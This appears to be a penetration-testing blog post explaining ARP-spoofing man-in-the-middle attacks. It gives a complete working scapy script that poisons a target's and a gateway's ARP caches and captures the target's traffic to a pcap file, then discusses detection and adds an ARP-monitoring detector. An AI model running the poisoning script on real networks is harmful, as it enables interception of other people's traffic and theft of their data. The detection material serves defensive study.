A man-in-the-middle attack works much like inserting a new node between two adjacent nodes of a linked list: the penetration tester uses the ARP protocol to keep sending ARP replies to both targets, replacing the MAC address each side holds for the other, so that the original client -> server (gateway, etc.) path becomes client -> man-in-the-middle -> server. Once this succeeds, the tester sits on the intermediate node and can process the traffic between the two ends at will.
I. Source code
# -*- coding: UTF-8 -*-
import sys
import time
import threading
from scapy.all import *

interface = "en0"
target_ip = "192.168.1.20"
gateway_ip = "192.168.1.1"
packet_count = 1000
# conf.iface = interface
# conf.verb = 0
print("发包端口 %s" % interface)

def get_mac(ip_address):
    # srp() sends and receives at layer 2: broadcast an ARP request for the given IP
    # and take the source MAC of the first reply as that host's MAC
    responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)
    for s, r in responses:
        return r[Ether].src
    return None

gateway_mac = get_mac(gateway_ip)
target_mac = get_mac(target_ip)
if target_mac is None:
    print("目标IP不可达")
    sys.exit(1)
else:
    print("[%s]的mac地址为[%s]" % (target_ip, target_mac))
if gateway_mac is None:
    print("网关不可达")
    sys.exit(1)
else:
    print("[%s]的mac地址为[%s]" % (gateway_ip, gateway_mac))

stop_event = threading.Event()  # set to tell the poisoning thread to stop

# Restore: tell both ends the real MAC addresses again
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    print("恢复....")
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)

# Man-in-the-middle: keep re-sending forged ARP replies to both ends
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    # "from the gateway" to the target host (hwsrc is left unset, so scapy fills in this machine's MAC)
    poison_target_pkt = ARP()
    poison_target_pkt.op = 2
    poison_target_pkt.psrc = gateway_ip
    poison_target_pkt.pdst = target_ip
    poison_target_pkt.hwdst = target_mac
    # "from the target host" to the gateway
    poison_gateway_pkt = ARP()
    poison_gateway_pkt.op = 2
    poison_gateway_pkt.psrc = target_ip
    poison_gateway_pkt.pdst = gateway_ip
    poison_gateway_pkt.hwdst = gateway_mac
    print("开始实施攻击....")
    # KeyboardInterrupt is only delivered to the main thread, so the loop is stopped via the event instead
    while not stop_event.is_set():
        send(poison_target_pkt)
        send(poison_gateway_pkt)
        time.sleep(2)
    print("攻击结束....")

poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
    print("启动抓包程序....")
    print("不要忘记开启 IP转发,否则目标IP无法上网。MAC:sudo sysctl -w net.inet.ip.forwarding=1 | linux: echo 1 > /proc/sys/net/ipv4/ip_forward")
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)  # start capturing
    wrpcap("arpTest.pcap", packets)  # write to a pcap file
except KeyboardInterrupt:
    pass
finally:
    # whether the capture finished or Ctrl+C was pressed: stop poisoning and repair both ARP caches
    stop_event.set()
    poison_thread.join()
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
Once the program is running, a Wireshark capture shows that the MAC addresses associated with 1.20 and 1.1 have both been replaced by the man-in-the-middle's MAC.
On the attacked client host, arp -a shows that the MAC recorded for the gateway address is now the man-in-the-middle's MAC.
If the man-in-the-middle does not enable IP forwarding, the attacked client cannot communicate with the network at all.
II. A few other notes
The damage a man-in-the-middle attack can cause is considerable, but the problem is also very easy to notice: address-conflict warnings, inspection of MAC addresses, and a slow or interrupted network are all angles from which to look, and analysing them locates the problem quickly. ARP lets us do plenty of other interesting things as well; in the next post I will share how to generate fake nodes based on ARP to build a dynamic defence architecture.
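The MAC-inspection angle above can be automated: the script in section one leaves two traces on the wire, the gateway's IP-to-MAC binding changes, and one MAC ends up answering for both the gateway IP and the target IP. The following detector is an added example, not code from this post; it parses raw Ethernet/ARP reply frames without scapy and replays a constructed four-frame sequence whose MACs and IPs are made up to mirror the 192.168.1.1 / 192.168.1.20 layout of the script.

```python
import struct
from collections import defaultdict
ETH_P_ARP, ARP_REPLY = 0x0806, 2

def parse_arp_reply(frame):
    """Return (sender_ip, sender_mac) for an Ethernet II ARP reply, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06" or frame[20:22] != b"\x00\x02":
        return None
    mac = ":".join(f"{b:02x}" for b in frame[22:28])
    ip = ".".join(str(b) for b in frame[28:32])
    return ip, mac

class ArpWatch:
    """Learn IP->MAC bindings from ARP replies and flag the poisoning patterns above."""
    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.ip_to_mac = {}                 # last MAC seen claiming each IP
        self.mac_to_ips = defaultdict(set)  # every IP each MAC has claimed
    def observe(self, frame):
        parsed = parse_arp_reply(frame)
        if parsed is None:
            return []
        ip, mac = parsed
        alerts = []
        old = self.ip_to_mac.get(ip)
        if old is not None and old != mac:
            alerts.append(f"binding change: {ip} moved from {old} to {mac}")
            if ip == self.gateway_ip:
                alerts.append(f"gateway {ip} now answered by {mac}")
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)
        if len(self.mac_to_ips[mac]) > 1:   # one NIC answering for several hosts
            alerts.append(f"{mac} claims {sorted(self.mac_to_ips[mac])}")
        return alerts

def build_arp_reply(sha, spa, tha, tpa):  # constructed test frame, not captured traffic
    eth = tha + sha + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY) + sha + spa + tha + tpa
    return eth + arp

def run_demo():  # replay the reply sequence the script above puts on the wire (constructed sample)
    gw_mac, host_mac, mitm_mac = map(bytes.fromhex, ("aabbccddee01", "aabbccddee20", "0a0b0c0d0e0f"))
    gw_ip, host_ip = bytes([192, 168, 1, 1]), bytes([192, 168, 1, 20])
    watch = ArpWatch("192.168.1.1")
    frames = [build_arp_reply(gw_mac, gw_ip, host_mac, host_ip),    # genuine gateway reply
              build_arp_reply(host_mac, host_ip, gw_mac, gw_ip),    # genuine host reply
              build_arp_reply(mitm_mac, gw_ip, host_mac, host_ip),  # forged: gateway IP from the MITM
              build_arp_reply(mitm_mac, host_ip, gw_mac, gw_ip)]    # forged: host IP from the MITM
    return [a for f in frames for a in watch.observe(f)]
```

A NIC replacement also changes a binding, so the strongest signal is the last alert: a single MAC claiming both the gateway and a host.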